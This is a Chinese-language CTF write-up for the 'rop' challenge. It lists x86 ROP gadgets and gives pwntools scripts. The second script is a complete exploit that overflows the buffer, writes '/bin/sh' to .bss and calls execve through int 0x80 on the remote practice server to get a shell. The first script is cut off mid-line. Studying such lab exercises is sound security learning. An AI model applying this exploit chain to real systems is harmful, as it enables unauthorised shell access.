ROP（ropchain）

check一下，发现只开了NX

image.png

拖进ida，发现里面有堆出现，但是和本题的关系不太大，题目提示用ROP，就直接系统调用吧。

image.png

image.png

0x080b8016 : pop eax ; ret
0x080481c9 : pop ebx ; ret
0x080de769 : pop ecx ; ret
0x0806ecda : pop edx ; ret
0x0804b5ba : pop dword ptr [ecx] ; ret

image.png

脚本一

#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import *
from struct import pack

context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048892'):
    raw_input('debug:')
    gdb.attach(sh, "b *" + addr)

elf = ELF('rop')
bss_addr = elf.bss()
print "%x" % bss_addr

sh = remote('hackme.inndy.tw', 7704)
p = 'A' * 0x10
p += pack('

脚本二

#-*-coding:utf-8-*-
from pwn import *
p = process('./rop')
p = remote("hackme.inndy.tw","7704")
elf = ELF('./rop')
bss_addr = elf.bss()
pop_in_ecx = 0x0804b5ba
pop_eax = 0x080b8016
pop_ebx = 0x080481c9
pop_ecx = 0x080de769
pop_edx = 0x0806ecda
int_0x80 = 0x0806c943
payload = 16*'a'
payload += p32(pop_ecx) + p32(bss_addr)
payload += p32(pop_in_ecx) + '/bin'
payload += p32(pop_ecx) + p32(bss_addr+4)
payload += p32(pop_in_ecx) + '/sh\x00'
payload += p32(pop_eax) + p32(0xb)
payload += p32(pop_ebx) + p32(bss_addr)
payload += p32(pop_ecx) + p32(0)
payload += p32(pop_edx) + p32(0)
payload += p32(int_0x80)
p.sendline(payload)
p.interactive()